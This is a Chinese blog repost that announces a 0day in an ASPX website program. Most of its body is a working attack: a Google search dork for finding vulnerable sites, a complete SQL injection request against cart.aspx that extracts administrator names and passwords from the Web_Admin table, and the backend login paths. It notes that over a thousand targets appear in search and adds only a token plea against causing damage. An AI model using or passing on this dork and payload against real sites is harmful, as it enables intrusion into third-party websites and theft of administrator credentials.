码迷,mamicode.com
首页 > 其他好文 > 详细

0DAY漏洞之谷歌搜索 -中国寒龙网病毒联盟

时间:2014-05-07 13:10:40      阅读:606      评论:0      收藏:0      [点我收藏+]

标签:des   style   blog   class   art   c   

这里公布一个关于aspx网站程序的oday方法很简单。直接爆出管理密码。

也是利用注入漏洞。

利用代码

谷歌搜索关键字:inurl:scoreindex.aspx

 

  1. cart.aspx?act=buy&id=1 and (SelectTop1char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124)From(SelectTop4[Name],[Pass]From[Web_Admin]Where1=1Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0--

后台地址:/weblogin/Login.aspx

后台地址/weblogin/index.aspx

这个oday出来也有一段时间了。搜索一下也有1300多个搜索结果,公布漏洞的目标不是为了让大家去搞破坏。希望大家合理利用。

0DAY漏洞之谷歌搜索 -中国寒龙网病毒联盟,布布扣,bubuko.com

0DAY漏洞之谷歌搜索 -中国寒龙网病毒联盟

标签:des   style   blog   class   art   c   

原文地址:http://www.cnblogs.com/Hkadmin/p/3712783.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!